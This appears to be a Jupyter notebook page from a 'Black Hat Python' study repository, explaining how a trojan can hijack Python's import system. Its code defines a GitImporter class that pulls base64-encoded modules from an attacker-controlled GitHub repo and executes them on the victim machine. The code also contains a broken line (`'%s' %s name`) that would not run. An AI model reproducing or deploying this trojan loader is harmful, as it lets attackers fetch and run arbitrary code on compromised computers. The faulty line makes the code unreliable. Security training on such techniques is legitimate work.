<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C7-Github_Command_And_Control/Hacking_Python_Import_Functionality.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Hacking Python's import Functionality__*

If you've made it this far in the book, you know that we use Python's __import__ functionality to copy external libraries into our programs so we can use their code. We want to be able to do the same thing for our trojan. But since we're controlling a remote machine, we may want to use a package not available on that machine, and there's no easy way to install packages remotely. Beyond that, we also want to make sure that if we pull in a dependency, such as __Scapy__, our trojan makes that module available to all other modules that we pull in.

Python allows us to customize how it imports modules; if it can't find a module locally, it will call an import class we define, which will allow us to remotely retrieve the library from our repo. We'll have to add our custom class to the __sys.meta_path__ list. Let's create this class now by adding the following code:

In [ ]:
class GitImporter:
    def __init__(self):
        self.current_module_code = ''

    def find_module(self, name, path=None):
        print('[*] Attempting to retrieve %s' %s name)
        self.repo = github_connect()
        new_library = get_file_contents('modules', f'{name}.py', self.repo)
        if new_library is not None:
            self.current_module_code = base64.b64decode(new_library) #[1]
            return self

    def load_module(self, name):
        spec = importlib.util.spec_from_loader(name, loader=None,
                                               origin=self.repo.git_url)
        new_module = importlib.util.module_from_spec(spec) #[2]
        exec(self.current_module_code, new_module.__dict__)
        sys.modules[spec.name] = new_module #[3]
        return new_module